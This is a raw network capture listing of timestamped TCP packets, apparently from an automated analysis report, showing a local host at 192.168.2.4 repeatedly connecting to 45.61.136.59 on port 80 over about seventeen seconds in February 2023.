                                                                                                                                            Feb 2, 2023 21:19:10.494664907 CET4991480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:10.659178972 CET804991445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:10.659394026 CET804991445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:10.707089901 CET4991480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.003829002 CET4991480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.037769079 CET4991580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.168781042 CET804991445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:11.169250011 CET4991480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.205585003 CET804991545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:11.205900908 CET4991580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.209343910 CET4991580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.377269983 CET804991545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:11.377324104 CET804991545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:11.426048994 CET4991580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.501032114 CET4991580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.539844036 CET4991680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.669069052 CET804991545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:11.669166088 CET4991580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.704746008 CET804991645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:11.704860926 CET4991680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.705369949 CET4991680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.870280027 CET804991645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:11.870371103 CET804991645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:11.925998926 CET4991680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:11.974883080 CET4991680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.002402067 CET4991780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.140058994 CET804991645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:12.140131950 CET4991680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.167331934 CET804991745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:12.167483091 CET4991780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.170830011 CET4991780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.335681915 CET804991745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:12.335808039 CET804991745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:12.379132986 CET4991780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.450911045 CET4991780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.490359068 CET4991880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.615998983 CET804991745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:12.619024038 CET4991780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.658576965 CET804991845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:12.658902884 CET4991880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.659173965 CET4991880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.826378107 CET804991845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:12.826410055 CET804991845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:12.879125118 CET4991880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.946918964 CET4991880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:12.977713108 CET4991980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:13.114274025 CET804991845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:13.115101099 CET4991880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:13.142502069 CET804991945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:13.143106937 CET4991980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:13.143441916 CET4991980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:13.308120966 CET804991945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:13.308712959 CET804991945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:13.363636971 CET4991980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:13.414671898 CET4991980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:13.452321053 CET4992080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:13.579543114 CET804991945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:13.580195904 CET4991980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:13.626194954 CET804992045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:13.626935005 CET4992080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:13.627383947 CET4992080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:13.801074982 CET804992045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:13.801183939 CET804992045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:13.847989082 CET4992080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:13.913077116 CET4992080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:13.981631994 CET4992180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:14.087091923 CET804992045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:14.087414026 CET4992080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:14.146511078 CET804992145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:14.149249077 CET4992180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:14.154829025 CET4992180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:14.319564104 CET804992145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:14.319607019 CET804992145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:14.363682985 CET4992180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:14.664589882 CET4992180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:14.698069096 CET4992280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:14.829476118 CET804992145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:14.829659939 CET4992180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:14.862968922 CET804992245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:14.863171101 CET4992280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:14.864108086 CET4992280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:15.028878927 CET804992245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:15.028935909 CET804992245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:15.082464933 CET4992280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:15.136579990 CET4992280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:15.301661968 CET804992245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:15.348088980 CET4992280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:15.430556059 CET4992280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:15.458554983 CET4992380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:15.595758915 CET804992245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:15.598261118 CET4992280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:15.626898050 CET804992345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:15.627018929 CET4992380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:15.627276897 CET4992380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:15.795387030 CET804992345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:15.795692921 CET804992345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:15.848232985 CET4992380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:15.914052963 CET4992380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:15.942419052 CET4992480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:16.082242012 CET804992345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:16.086738110 CET4992380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:16.107254028 CET804992445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:16.107471943 CET4992480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:16.107753038 CET4992480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:16.272363901 CET804992445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:16.272450924 CET804992445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:16.317001104 CET4992480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:16.384546041 CET4992480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:16.420659065 CET4992580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:16.549760103 CET804992445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:16.555413008 CET4992480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:16.588599920 CET804992545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:16.588875055 CET4992580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:16.589262962 CET4992580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:16.757086992 CET804992545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:16.757189035 CET804992545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:16.801434994 CET4992580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:16.874895096 CET4992580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:16.908135891 CET4992680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:17.043399096 CET804992545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:17.046863079 CET4992580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:17.076397896 CET804992645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:17.077663898 CET4992680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:17.131511927 CET4992680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:17.299752951 CET804992645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:17.300225019 CET804992645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:17.348295927 CET4992680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:17.484962940 CET4992680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:17.514343023 CET4992780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:17.653206110 CET804992645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:17.653358936 CET4992680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:17.679250956 CET804992745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:17.679481030 CET4992780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:17.686743975 CET4992780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:17.851788998 CET804992745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:17.851855993 CET804992745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:17.895260096 CET4992780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:17.964632988 CET4992780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:18.057698965 CET4992880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:18.129739046 CET804992745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:18.129946947 CET4992780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:18.225122929 CET804992845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:18.225317001 CET4992880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:18.325995922 CET4992880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:18.493345022 CET804992845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:18.494101048 CET804992845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:18.535877943 CET4992880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:19.060852051 CET4992880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:19.093431950 CET4992980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:19.228677034 CET804992845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:19.228843927 CET4992880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:19.261435032 CET804992945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:19.261537075 CET4992980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:19.261794090 CET4992980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:19.429383993 CET804992945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:19.429526091 CET804992945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:19.473470926 CET4992980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:19.728648901 CET4992980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:19.762432098 CET4993080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:19.896008015 CET804992945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:19.898509026 CET4992980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:19.930576086 CET804993045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:19.930761099 CET4993080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:19.931093931 CET4993080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:20.098647118 CET804993045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:20.098773003 CET804993045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:20.145483971 CET4993080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:20.210772038 CET4993080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:20.241090059 CET4993180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:20.378643036 CET804993045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:20.378796101 CET4993080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:20.406054974 CET804993145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:20.406250954 CET4993180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:20.406650066 CET4993180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:20.571264982 CET804993145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:20.571352959 CET804993145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:20.614204884 CET4993180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:20.975883961 CET4993180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.014323950 CET4993280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.140945911 CET804993145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:21.141220093 CET4993180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.179380894 CET804993245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:21.183865070 CET4993280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.184225082 CET4993280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.349112034 CET804993245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:21.349169016 CET804993245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:21.395504951 CET4993280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.460776091 CET4993280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.488735914 CET4993380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.626130104 CET804993245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:21.626338005 CET4993280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.662832975 CET804993345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:21.663113117 CET4993380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.663435936 CET4993380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.838289976 CET804993345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:21.838412046 CET804993345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:21.879981995 CET4993380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.951400042 CET4993380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:21.981779099 CET4993480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:22.127130032 CET804993345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:22.127223969 CET4993380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:22.147557974 CET804993445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:22.147736073 CET4993480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:22.148663044 CET4993480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:22.316112041 CET804993445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:22.316175938 CET804993445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:22.364413023 CET4993480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:22.429322958 CET4993480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:22.463813066 CET4993580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:22.594644070 CET804993445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:22.594764948 CET4993480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:22.633963108 CET804993545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:22.634200096 CET4993580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:22.657219887 CET4993580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:22.828171015 CET804993545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:22.828241110 CET804993545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:22.880040884 CET4993580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:23.281490088 CET4993580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:23.321324110 CET4993680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:23.449668884 CET804993545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:23.449774981 CET4993580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:23.486481905 CET804993645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:23.486773968 CET4993680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:23.487126112 CET4993680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:23.652160883 CET804993645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:23.653186083 CET804993645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:23.708237886 CET4993680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:23.758635044 CET4993680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:23.793834925 CET4993780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:23.924763918 CET804993645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:23.926570892 CET4993680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:23.959073067 CET804993745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:23.959386110 CET4993780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:23.960062981 CET4993780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:24.125125885 CET804993745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:24.125262976 CET804993745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:24.177109957 CET4993780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:24.252194881 CET4993780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:24.289800882 CET4993880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:24.417545080 CET804993745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:24.417781115 CET4993780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:24.458209991 CET804993845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:24.458343983 CET4993880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:24.458988905 CET4993880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:24.627124071 CET804993845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:24.627202034 CET804993845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:24.677097082 CET4993880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:24.813205004 CET4993880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:24.849551916 CET4993980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:24.981374025 CET804993845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:24.981481075 CET4993880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.016578913 CET804993945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:25.016810894 CET4993980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.017015934 CET4993980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.181804895 CET804993945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:25.181904078 CET804993945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:25.223975897 CET4993980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.289530993 CET4993980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.320063114 CET4994080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.454500914 CET804993945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:25.454644918 CET4993980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.486006975 CET804994045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:25.486140013 CET4994080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.486398935 CET4994080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.651299000 CET804994045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:25.651338100 CET804994045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:25.692744017 CET4994080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.760452986 CET4994080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.798590899 CET4994180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.925329924 CET804994045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:25.925421953 CET4994080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.963512897 CET804994145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:25.963640928 CET4994180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:25.963960886 CET4994180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:26.129455090 CET804994145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:26.129509926 CET804994145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:26.177222013 CET4994180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:26.245771885 CET4994180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:26.291753054 CET4994280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:26.410927057 CET804994145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:26.411676884 CET4994180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:26.458113909 CET804994245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:26.458239079 CET4994280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:26.458576918 CET4994280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:26.623073101 CET804994245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:26.623122931 CET804994245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:26.677350044 CET4994280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:26.729322910 CET4994280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:26.766232967 CET4994380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:26.894205093 CET804994245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:26.896320105 CET4994280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:26.930967093 CET804994345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:26.931077957 CET4994380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:26.932137012 CET4994380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:27.096589088 CET804994345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:27.096647024 CET804994345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:27.146125078 CET4994380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:27.212510109 CET4994380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:27.251446962 CET4994480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:27.377258062 CET804994345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:27.377511024 CET4994380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:27.416023016 CET804994445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:27.418857098 CET4994480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:27.419188023 CET4994480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:27.584626913 CET804994445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:27.584728003 CET804994445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:27.630492926 CET4994480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:27.695854902 CET4994480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:27.731159925 CET4994580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:27.861531019 CET804994445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:27.863312006 CET4994480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:27.895946026 CET804994545.61.136.59192.168.2.4
